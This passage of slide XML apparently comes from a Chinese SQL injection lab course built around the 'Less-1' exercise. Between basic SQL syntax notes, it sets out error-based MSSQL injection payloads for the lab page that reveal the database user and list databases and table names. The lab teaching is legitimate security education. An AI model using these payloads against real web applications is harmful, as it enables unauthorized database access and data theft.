                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>[</a:t>
            </a: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d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>b</a:t>
            </a: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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>]</a:t>
            </a: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删除数据库：drop database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>[</a:t>
            </a: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dbname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>]</a:t>
            </a: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创建新表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>create table [tablename] ( name char(10), age tinyint, sex int )</a:t>
            </a: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删除新表：drop table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>[tablename]</a:t>
            </a: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向表中插入内容：insert into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>[tablename]</a:t>
            </a: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(field1,field2） values(value1,value2）</a:t>
            </a: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删除内容：delete from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>[tablename]</a:t>
            </a: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 where 范围</a:t>
            </a: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更新内容：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>u</a:t>
            </a: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pdate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>[</a:t>
            </a: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table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>name]</a:t>
            </a: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 set field1=value1 where 范围</a:t>
            </a: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查找：select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>[</a:t>
            </a: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table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>name]</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> where field1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>=”ichunqiu”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143840" y="335251"/>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基本使用</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400" dirty="0"/>
              <a:t>实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432647" y="3730414"/>
            <a:ext cx="8090747" cy="4924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defTabSz="1219170" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602783" y="1017056"/>
            <a:ext cx="11545147" cy="39395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以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Less-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>为例</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p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>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判断当前数据库用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>/less-1.asp?id=1' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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()&gt;0  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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79988" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>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获得</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Helvetica"/>
              </a:rPr>
              <a:t>其他数据库</a:t>
            </a:r>
            <a:endPar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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>/less-1.asp?id=1' and (select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>master.sys.databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>database_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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=N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>)&gt;0  --</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CEC0E83-0665-914D-A09D-FA35B55A53DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="3377" t="12330" r="1928" b="5919"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2149428" y="2321347"/>
            <a:ext cx="7893144" cy="1803024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2459F72-553F-764D-BAC8-01AC067D9BA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="13943" t="8536" r="2847" b="10543"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6535576" y="5066807"/>
            <a:ext cx="5226064" cy="1377160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFDC5DB6-F7F5-B740-8F9B-70EA835C4AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="2760" t="10106" r="3348" b="8516"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="695761" y="5077501"/>
            <a:ext cx="5679596" cy="1377160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369932964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400" dirty="0"/>
              <a:t>实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432647" y="3730414"/>
            <a:ext cx="8090747" cy="4924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defTabSz="1219170" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549109" y="1020850"/>
            <a:ext cx="11642892" cy="58092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以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Less-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>为例</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p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>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获得表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>/less-1.asp?id=1' and 1=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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convert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>,(select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--</a:t>
            </a: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r>
              <a:rPr lang="zh-CN" altLang="en" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>其他表名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>/less-1.asp?id=1' and 1=(select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
